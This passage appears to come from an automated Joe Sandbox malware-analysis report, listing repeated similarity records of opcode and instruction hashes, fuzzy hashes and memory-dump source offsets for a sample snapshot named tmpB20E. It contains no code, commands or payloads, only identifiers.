                                                                                      • Opcode ID: 7bbf5b1c293f1dc1badaab1a69a66c0b4374f544b66550e1f0f3f4a293663747
                                                                                      • Instruction ID: d5ac5019cead19c917344f317dab3e7d3d028c06a880fde9890e19adb6844a90
                                                                                      • Opcode Fuzzy Hash: 7bbf5b1c293f1dc1badaab1a69a66c0b4374f544b66550e1f0f3f4a293663747
                                                                                      • Instruction Fuzzy Hash: 0451D061D4E90B9FFB4DEB3888466A57BD4EF16314F4492B9E00DC71D3ED18E84A8391
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 350811704dd66d870325f2e5392828560dbdd3e110985e3e6891b0847dd18d0a
                                                                                      • Instruction ID: 4c6e1fdcfb586f77c24269239890f6a357e9193e6d9e17de87d8d138bd28e200
                                                                                      • Opcode Fuzzy Hash: 350811704dd66d870325f2e5392828560dbdd3e110985e3e6891b0847dd18d0a
                                                                                      • Instruction Fuzzy Hash: C0518870A1991E9FEB9CEB28D845ABC77E6FF99304F405579F00DD3292DE38A8458780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 605cc8ab646c959cc2b560400bd0eaabe77d1e336d90a671eb4eea3f651df42d
                                                                                      • Instruction ID: e8edbac63162b82f03f249f79e1b14c971a0dcb2a6914450eecc838e87e4a9c1
                                                                                      • Opcode Fuzzy Hash: 605cc8ab646c959cc2b560400bd0eaabe77d1e336d90a671eb4eea3f651df42d
                                                                                      • Instruction Fuzzy Hash: DD51C571A1994A8FEB9DEB28D8556A87BE5FF56304F0484B9F00DD3293DE28A8458780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: de96eadeae0780ad099851971eab849fc3ca5ee173f8362d332970f6682b6220
                                                                                      • Instruction ID: 03047f413460102e24960025d5043128fce397b2f0698e170242e9ccdea7bfc3
                                                                                      • Opcode Fuzzy Hash: de96eadeae0780ad099851971eab849fc3ca5ee173f8362d332970f6682b6220
                                                                                      • Instruction Fuzzy Hash: E3412761B0DA890FE789A77C94596797FD5EF8A214F0841FEE04EC72E3DD289C068341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fc18db9a4842721006c7debd96e223d40c9d47906b107faf5798dffc75084ecb
                                                                                      • Instruction ID: 0c5d13c19da7970ba37623a67eae96e85f2673b09e55135d997967192e9dca3b
                                                                                      • Opcode Fuzzy Hash: fc18db9a4842721006c7debd96e223d40c9d47906b107faf5798dffc75084ecb
                                                                                      • Instruction Fuzzy Hash: A441BA7194990A8FEB88EB68C4596BD7BF1FF59310B04457AE40DD3263EE389845C750
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 01353b2f8fcb0f594c3661090b252019b0b8d98caf4e1925bb0c713c67453880
                                                                                      • Instruction ID: 7db5defb1952ee925f4fd0349e8d7f9de2a46a18e7187b7f829f1ee1436e617b
                                                                                      • Opcode Fuzzy Hash: 01353b2f8fcb0f594c3661090b252019b0b8d98caf4e1925bb0c713c67453880
                                                                                      • Instruction Fuzzy Hash: EB416371A1891D8FEB98EB78C459AB977E6EF99310F144579E00ED32A2DE34EC41C780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b00b98acda2679dd1beca496be81091774602d8194ee8942062e2cc66a965a75
                                                                                      • Instruction ID: 1114765e349e2f245f215abb1dd84fab907a89aa6a30bc27bf98b7d7f7085805
                                                                                      • Opcode Fuzzy Hash: b00b98acda2679dd1beca496be81091774602d8194ee8942062e2cc66a965a75
                                                                                      • Instruction Fuzzy Hash: 71319561B199490FE798AB2CD45A779B7C6EB99315F4446BEE04EC32D3DE649C028380
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 99863b343966d21e29f61a66d9c4d680cf5c5c907788016cb396dca4f1f7df13
                                                                                      • Instruction ID: f8396f91504336f7b83c8a4b8d5ee7f754f332dbad6dc215fc81d9dd0e3de590
                                                                                      • Opcode Fuzzy Hash: 99863b343966d21e29f61a66d9c4d680cf5c5c907788016cb396dca4f1f7df13
                                                                                      • Instruction Fuzzy Hash: 71419571E0850A8BEB88EB78C0556BABBE5FF55310F5481BDE01ED32D2DE29E845C780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1fe04199e8ab0b7990cfb4e67854845a9dc2c0ad6222242b72e63c2134ded66d
                                                                                      • Instruction ID: 81d6a686d0aa45ea6519207783a3d10c29998e6f0c818506ac7a8e3f82101ee8
                                                                                      • Opcode Fuzzy Hash: 1fe04199e8ab0b7990cfb4e67854845a9dc2c0ad6222242b72e63c2134ded66d
                                                                                      • Instruction Fuzzy Hash: B631B491B18A0A4FF744B7BCD8197BD7BD6EB99751F0482B6F00DC3293EE1898414381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 45e911f3113ff7efb000501d663563ecf2c16b8fa08ceead850ae2dadbafe0b1
                                                                                      • Instruction ID: df74438f2a776081f21c0feb791dafc9af59604f6094c9565b662a91db058a8b
                                                                                      • Opcode Fuzzy Hash: 45e911f3113ff7efb000501d663563ecf2c16b8fa08ceead850ae2dadbafe0b1
                                                                                      • Instruction Fuzzy Hash: 5541157185968A8FE70997648C625F9BFE4EF42310B4481BAE04ED74D3DE1CA84A8395
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 221edfa1818801d15db471fd03d4ca2265b086b0b4d51dfac2d49285e364c325
                                                                                      • Instruction ID: c399ffbab440cc860d8fa312dbfa6d9e8d1c3f5fbbb42f05524ab2a362cdd2ad
                                                                                      • Opcode Fuzzy Hash: 221edfa1818801d15db471fd03d4ca2265b086b0b4d51dfac2d49285e364c325
                                                                                      • Instruction Fuzzy Hash: ED41C470E1864E8FEB48EB78C4656A97BF1FF99300F548575E00DD3297DE38A8058790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8dbc1f9bb2f27ef8d45c776a1e0ba7b1cf6d15d95cce36de40d344e2483076a3
                                                                                      • Instruction ID: 2c691e13162134d2a1451fd317abe659b43d0cd1d1eb1a3e423dfe058241d525
                                                                                      • Opcode Fuzzy Hash: 8dbc1f9bb2f27ef8d45c776a1e0ba7b1cf6d15d95cce36de40d344e2483076a3
                                                                                      • Instruction Fuzzy Hash: E231A492B18D0A4BF784B7BCD81A7BD66D6EBD9751F1082BAF00EC3293ED1898414381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 099bc23c134f7bc79845697f114fd48af66c8acd556f9f2b981b18a9dd0bd282
                                                                                      • Instruction ID: 7faaec75d2e64a75b2b19fae70ca2aa919da767e95e3d6efede48369090f832a
                                                                                      • Opcode Fuzzy Hash: 099bc23c134f7bc79845697f114fd48af66c8acd556f9f2b981b18a9dd0bd282
                                                                                      • Instruction Fuzzy Hash: 6B31923140D7488FDB59DBA8D885AEABFF0FF56310F0481AED049C3552D764A805CB51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0de8072b6e1d621ca16a2ba60a2be6c4ff4436d7de92fa42e41d0c71ace3f1f3
                                                                                      • Instruction ID: a95564eb6e277c7209a8591abd50bbbd66d7061f13b445ba93923f3dbed647dd
                                                                                      • Opcode Fuzzy Hash: 0de8072b6e1d621ca16a2ba60a2be6c4ff4436d7de92fa42e41d0c71ace3f1f3
                                                                                      • Instruction Fuzzy Hash: 3031F53060DA9ACFD74EFB38C8515A97BE1FF06304B4505E6D049C3297DA38E885C791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e9135167d860c822ee302bb29583be20e296e914e6c38e9c2187716734ae9468
                                                                                      • Instruction ID: a9895151054a520abe1c0a1d6de664110b87d54d419a2c46909d46c6843b152c
                                                                                      • Opcode Fuzzy Hash: e9135167d860c822ee302bb29583be20e296e914e6c38e9c2187716734ae9468
                                                                                      • Instruction Fuzzy Hash: 3231F4B2A0994A8FEB5CDB38D4956BDBBE0FF55310F00527EE04ED3292DE299805C781
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 363bd537baddb86937753d0408d29bea29d271cccd6f9a2651bbc53af75bf36d
                                                                                      • Instruction ID: 18cdf706b486cac8d159208f47beb4f721b56fc4832ccab048fb1cabebd923ab
                                                                                      • Opcode Fuzzy Hash: 363bd537baddb86937753d0408d29bea29d271cccd6f9a2651bbc53af75bf36d
                                                                                      • Instruction Fuzzy Hash: A821C561E4E6438BF799B778845667A2A9AAF93310F5480B9F00EC61C7FD2CE80943D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd